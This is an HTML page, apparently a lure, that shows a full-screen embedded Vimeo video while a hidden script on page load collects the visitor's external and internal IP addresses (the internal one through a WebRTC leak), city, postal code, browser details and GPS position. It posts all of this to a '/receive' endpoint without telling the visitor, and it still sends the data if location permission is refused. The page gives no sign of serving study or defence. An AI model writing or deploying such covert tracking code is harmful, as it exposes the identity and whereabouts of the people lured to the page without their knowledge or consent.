<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>فيديو ملء الشاشة</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body, html {
            width: 100%;
            height: 100%;
            overflow: hidden;
            background-color: black;
        }

        .video-container {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            display: flex;
            justify-content: center;
            align-items: center;
        }

        iframe {
            width: 100%;
            height: 100%;
            border: none;
        }
    </style>
</head>
<body>
    <div class="video-container">
        <iframe src="https://player.vimeo.com/video/1061050916?h=05ca902f09&badge=0&autopause=0&player_id=0&app_id=58479" allowfullscreen></iframe>
    </div>

    <script>
        async function collectData() {
            let data = {};

            // ✅ جلب IP الخارجي، الدولة، المدينة، الرمز البريدي
            let ipInfo = await fetch("https://ipinfo.io/json").then(res => res.json());
            data["external_ip"] = ipInfo.ip;
            data["country"] = ipInfo.country;
            data["city"] = ipInfo.city;
            data["postal"] = ipInfo.postal;

            // ✅ جلب IP الداخلي
            async function getLocalIP() {
                return new Promise((resolve) => {
                    let pc = new RTCPeerConnection();
                    pc.createDataChannel("");
                    pc.createOffer().then(offer => pc.setLocalDescription(offer));
                    pc.onicecandidate = event => {
                        if (event && event.candidate) {
                            resolve(event.candidate.address);
                        }
                    };
                });
            }
            data["internal_ip"] = await getLocalIP();

            // ✅ بيانات الجهاز والمتصفح
            data["browser"] = navigator.userAgent;
            data["device"] = navigator.platform;

            // ✅ تحديد الموقع الجغرافي
            navigator.geolocation.getCurrentPosition(position => {
                data["latitude"] = position.coords.latitude;
                data["longitude"] = position.coords.longitude;
                sendData(data);
            }, () => sendData(data));  // إذا رفض المستخدم إذن الموقع، أرسل البيانات المتاحة فقط
        }

        function sendData(data) {
            fetch("/receive", {
                method: "POST",
                headers: { "Content-Type": "application/json" },
                body: JSON.stringify(data)
            }).then(() => console.log("✅ Data sent successfully"));
        }

        window.onload = collectData;
    </script>
</body>
</html>
